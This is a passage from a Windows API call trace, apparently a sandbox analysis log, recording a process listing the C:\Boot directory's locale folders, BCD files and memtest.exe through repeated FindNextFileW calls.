lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0052.376] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0052.377] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0052.378] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0052.378] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0052.378] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0052.378] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0052.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0052.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0052.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0052.378] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0052.378] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0052.378] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0052.378] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0052.379] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0052.380] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0052.381] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 